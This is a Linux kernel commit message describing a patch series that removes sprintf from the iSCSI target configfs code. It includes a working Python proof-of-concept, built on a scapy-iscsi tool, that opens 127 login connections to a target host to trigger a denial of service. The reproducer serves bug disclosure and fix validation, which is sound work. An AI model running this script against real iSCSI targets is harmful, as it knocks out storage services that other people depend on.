Konstantin Shelekhin <k.shelekhin@yadro.com> says:

This patch series cleanses iscsi_target_configfs.c of sprintf
usage. The first patch fixes the real problem, the second just makes
sure we are on the safe side from now on.

I've reproduced the issue fixed in the first patch by utilizing this
cool thing:

  https://git.sr.ht/~kshelekhin/scapy-iscsi

Yeah, shameless promoting of my own tools, but I like the simplicity
of scapy and writing tests in C with libiscsi can be a little
cumbersome.

Check it out:

  #!/usr/bin/env python3
  # Let's cause some DoS in iSCSI target

  import sys

  from scapy.supersocket import StreamSocket
  from scapy_iscsi.iscsi import *

  cpr = {
      "InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59",
      "TargetName": "iqn.2023-07.com.example:target",
      "HeaderDigest": "None",
      "DataDigest": "None",
  }

  spr = {
      "SessionType": "Normal",
      "ErrorRecoveryLevel": 0,
      "DefaultTime2Retain": 0,
      "DefaultTime2Wait": 2,
      "ImmediateData": "Yes",
      "FirstBurstLength": 65536,
      "MaxBurstLength": 262144,
      "MaxRecvDataSegmentLength": 262144,
      "MaxOutstandingR2T": 1,
  }

  if len(sys.argv) != 3:
      print("usage: dos.py <host> <port>", file=sys.stderr)
      exit(1)

  host = sys.argv[1]
  port = int(sys.argv[2])
  isid = 0xB00B
  tsih = 0
  connections = []

  for i in range(0, 127):
      s = socket.socket()
      s.connect((host, port))
      s = StreamSocket(s, ISCSI)

      ds = cpr if i > 0 else cpr | spr
      lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds))
      lirs = s.sr1(lirq)
      tsih = lirs.tsih

      connections.append(s)

  input()

Link: https://lore.kernel.org/r/20230722152657.168859-1-k.shelekhin@yadro.comSigned-off-by: Martin K. Petersen <martin.petersen@oracle.com>